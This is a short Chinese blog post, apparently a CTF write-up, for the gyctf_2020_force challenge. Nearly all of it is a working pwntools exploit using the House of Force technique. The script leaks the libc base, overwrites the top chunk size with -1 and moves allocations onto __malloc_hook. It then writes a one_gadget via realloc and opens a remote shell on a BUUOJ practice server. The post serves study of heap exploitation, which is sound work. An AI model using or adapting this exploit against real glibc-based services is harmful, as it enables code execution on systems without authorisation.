gyctf_2020_force | House of force
阿新 • • 發佈:2020-12-14
House of force 算是比較容易理解的堆利用手法,本題主要是一個裸的 HOF,但是因為各種各樣的錯誤調了整整兩個晚上才在打通,身心俱疲,有點喪失繼續學 pwn 的信心了,還是記錄一下
EXP
libc 是我本地帶符號表的
from pwn import * libc_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so' ld_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so' elf_path = './gyctf_2020_force' #r = process([ld_path, elf_path], env={"LD_PRELOAD":libc_path}) r = remote('node3.buuoj.cn', '29681') context.log_level = 'debug' elf = ELF(elf_path) libc = ELF(libc_path) gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147] def add(size, content): r.sendlineafter('2:puts', '1') r.sendlineafter('size', str(size)) r.recvuntil('bin addr ') addr = int(r.recvuntil('\n')[:-1], 16) r.sendlineafter('content', content) return addr def show(idx): r.sendlineafter('2:puts', '2') def debug(): gdb.attach(r) pause() addr = add(1000000, 'aaaa') success('malloc addr -> ' + hex(addr)) pay = 'a'*0x10 + p64(0) + p64(999999999999) libc_base = addr - 0x6fa010 realloc = libc_base + libc.symbols['__libc_realloc'] success('addr - >' + hex(realloc)) success('libc_base ->' + hex(libc_base)) pay = 'a'*0x10 + p64(0) + p64(0xffffffffffffffff) top_chunk = add(0x18, pay) + 0x10 success('top chunk -> ' + hex(top_chunk)) target = libc_base + libc.symbols['__malloc_hook'] - top_chunk - 0x33 pay = p64(0) + p64(libc_base + gadget[1]) + p64(realloc+0x10) add(target, 'a'*0x8) add(0x10, pay) r.sendlineafter('2:puts\n', '1') r.sendlineafter('size\n', str(0x40)) r.interactive()